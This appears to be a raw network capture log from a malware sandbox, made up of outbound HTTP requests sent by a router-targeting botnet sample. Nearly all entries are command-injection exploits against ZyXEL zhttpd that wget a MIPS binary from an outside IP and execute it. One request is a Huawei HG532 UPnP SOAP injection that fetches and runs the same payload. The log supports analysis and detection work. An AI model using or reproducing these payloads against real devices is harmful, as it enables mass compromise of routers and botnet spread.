                                                Jan 12, 2024 18:16:32.681441069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6899192.168.2.2335564131.181.32.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.681519032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6900192.168.2.2354244119.221.15.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.681550026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6901192.168.2.235329468.123.99.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.681693077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6902192.168.2.233771849.136.47.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.681730986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6903192.168.2.2341036161.229.234.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.681804895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6904192.168.2.2356222219.138.240.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.681883097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6905192.168.2.2340722115.132.201.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.681929111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6906192.168.2.2340310191.236.224.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.682005882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6907192.168.2.2353346160.86.167.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.682044029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6908192.168.2.2345322135.180.6.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.682105064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6909192.168.2.234717266.51.122.23637215
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.430619001 CET845OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 476
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 20 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.188 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6910192.168.2.2358174149.177.11.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.697679043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6911192.168.2.234916640.3.20.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.697840929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6912192.168.2.2339186164.248.69.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.697932005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6913192.168.2.234117044.125.80.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.697966099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6914192.168.2.234086667.128.86.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.698044062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6915192.168.2.235811032.70.58.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.698077917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6916192.168.2.2344974147.18.13.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.698148966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6917192.168.2.23409922.152.210.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.698210955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6918192.168.2.2336150168.239.180.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.698277950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6919192.168.2.23392604.14.173.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.698339939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6920192.168.2.2358160136.216.149.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.698373079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6921192.168.2.2343728217.242.201.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.698441029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6922192.168.2.2359186147.0.167.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.698479891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6923192.168.2.2356380165.2.57.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.698534966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6924192.168.2.2349722135.19.201.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.698617935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6925192.168.2.2342376175.154.17.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.698642969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6926192.168.2.2354740172.190.53.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.698719978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6927192.168.2.2333340148.54.172.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.698785067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6928192.168.2.2346896102.131.134.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.698827028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6929192.168.2.2348200204.134.92.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.698872089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6930192.168.2.234335262.230.4.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.698921919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6931192.168.2.2360762137.95.83.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.698978901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6932192.168.2.235676297.244.191.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.699042082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6933192.168.2.2360908154.3.154.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.699112892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6934192.168.2.235490876.249.18.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.699157000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6935192.168.2.2346498166.152.36.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.699250937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6936192.168.2.233822667.180.240.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.699311972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6937192.168.2.234358425.142.57.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.699358940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6938192.168.2.235019288.169.186.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.699426889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6939192.168.2.234320487.130.131.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.699485064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6940192.168.2.233487639.76.5.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.699542999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6941192.168.2.2346664132.76.203.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.699630022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6942192.168.2.233989057.191.167.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.699645042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6943192.168.2.2337320104.9.210.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.699706078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6944192.168.2.2354862117.9.68.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.699774981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6945192.168.2.2349708170.137.148.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.699827909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6946192.168.2.2352466157.207.96.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.699868917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6947192.168.2.233985499.240.108.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.699920893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6948192.168.2.2337854146.150.70.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.699987888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6949192.168.2.234353450.141.96.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.700035095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6950192.168.2.2338204219.94.123.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.700095892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6951192.168.2.2343104143.47.122.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.700150013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6952192.168.2.2336216163.177.198.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.700205088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6953192.168.2.234728694.0.208.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.700279951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6954192.168.2.235076472.250.118.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.700315952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6955192.168.2.2338084104.102.17.254443
                                                TimestampBytes transferredDirectionData
